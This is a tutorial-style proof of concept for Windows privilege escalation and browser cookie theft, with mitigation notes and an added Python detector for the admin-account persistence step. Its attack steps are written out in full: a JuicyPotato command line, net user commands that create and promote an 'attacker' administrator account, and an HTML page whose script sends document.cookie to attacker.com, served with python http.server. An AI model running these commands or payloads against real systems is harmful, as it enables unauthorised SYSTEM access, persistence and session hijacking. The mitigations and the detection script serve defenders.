Privilege Escalation & Client-Side Exploits

1. Introduction

Privilege escalation is a technique attackers use to gain elevated access to a system. This can be achieved through various exploits, misconfigurations, or vulnerable software.

Client-side exploits, on the other hand, target users by exploiting vulnerabilities in applications such as web browsers, PDF readers, or email clients.

This document provides a structured proof-of-concept (PoC) for privilege escalation and a client-side exploit.


2. Privilege Escalation Exploit (Windows)

Step 1: Identifying a Vulnerable System

Run the following command to check current privileges:

whoami /priv

If the output lists SeImpersonatePrivilege as Enabled, the current account may be able to escalate through token impersonation, the class of attack that the JuicyPotato step below automates.

Step 2: Exploiting the Vulnerability (JuicyPotato Attack)

Use JuicyPotato to escalate privileges:

JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {clsid} -a "/c whoami"

If successful, the output should show NT AUTHORITY\SYSTEM, indicating privilege escalation.

Step 3: Maintaining Access

To create a new administrative user:

net user attacker P@ssw0rd /add
net localgroup administrators attacker /add

Now the attacker has persistent administrative access. Note that this step is noisy: it creates a new local account and changes the membership of the Administrators group, and when account-management auditing is enabled Windows records both actions in the Security event log.

Mitigation Strategies

  • Apply the latest security patches to prevent known privilege escalation exploits.

  • Remove SeImpersonatePrivilege and similar privileges from accounts that do not need them.

  • Use Windows Defender Exploit Guard to restrict token manipulation.
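As an added detection example (not part of the original write-up), the following Python script correlates the two audit events that the net user /add and net localgroup administrators /add commands above generate when account-management auditing is enabled: Security event 4720 (user account created) followed shortly by 4732 (member added to a security-enabled local group). The log lines and their field layout are constructed for the example and simplified relative to the real event XML.

```python
from datetime import datetime, timedelta

# Constructed sample events in a simplified "time id account=... group=..." layout.
# Real equivalents: Security event 4720 (user account created) and
# 4732 (member added to a security-enabled local group such as Administrators).
SAMPLE_LOG = """\
2024-05-01T10:00:02 4624 account=svc_web group=-
2024-05-01T10:14:31 4720 account=attacker group=-
2024-05-01T10:14:33 4732 account=attacker group=Administrators
2024-05-01T11:02:10 4720 account=jsmith group=-
2024-05-01T15:40:00 4732 account=jsmith group=Remote Desktop Users
2024-05-02T09:00:00 4732 account=backupsvc group=Administrators
"""


def parse_events(text):
    """Turn each constructed log line into (time, event_id, account, group)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, acct, grp = line.split(" ", 3)
        events.append((datetime.fromisoformat(ts), int(eid),
                       acct.split("=", 1)[1], grp.split("=", 1)[1]))
    return events


def find_fast_admin_persistence(events, window=timedelta(minutes=5)):
    """Return (account, created_at, added_at) for every account that was
    created (4720) and then added to Administrators (4732) within `window`.
    That sequence is exactly what the net user / net localgroup commands
    produce; a long gap or a pre-existing account does not match."""
    created = {}  # account -> creation timestamp
    hits = []
    for ts, eid, acct, grp in sorted(events):
        if eid == 4720:
            created[acct] = ts
        elif eid == 4732 and grp.lower() == "administrators" and acct in created:
            if ts - created[acct] <= window:
                hits.append((acct, created[acct].isoformat(), ts.isoformat()))
    return hits


if __name__ == "__main__":
    for acct, created_at, added_at in find_fast_admin_persistence(parse_events(SAMPLE_LOG)):
        print(f"ALERT: {acct} created {created_at}, made Administrator {added_at}")
```

In the sample only the "attacker" account matches; jsmith is added to a non-administrative group and backupsvc was not newly created, so neither is flagged.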


3. Client-Side Exploit (Browser-Based Attack)

Step 1: Setting Up a Malicious Webpage

An attacker can create a malicious HTML page to exploit browser vulnerabilities:

<html>
  <script>
    // Sends whatever document.cookie exposes to the attacker's server.
    // document.cookie only returns cookies for the origin this script runs in,
    // and never cookies marked HttpOnly.
    fetch('http://attacker.com/steal?cookie=' + document.cookie);
  </script>
</html>

When a victim loads this page, the script sends the cookies it can read to the attacker's server. Because document.cookie only exposes cookies for the origin the script runs in, this payload yields another site's session cookies only when it executes within that site, for example after being injected through a cross-site scripting flaw.

Step 2: Hosting the Exploit

Host the malicious page using Python:

python3 -m http.server 8080

The attacker waits for the victim to visit the site.

Step 3: Exploiting the User

If the victim's browser is vulnerable, their session cookies are sent to the attacker's server.

Mitigation Strategies

  • Use a Content Security Policy (CSP) to restrict which scripts may run and which origins the page may connect to.

  • Set the HttpOnly and Secure flags on session cookies, so that script cannot read them and they are only sent over HTTPS.

  • Keep browsers updated to patch known vulnerabilities.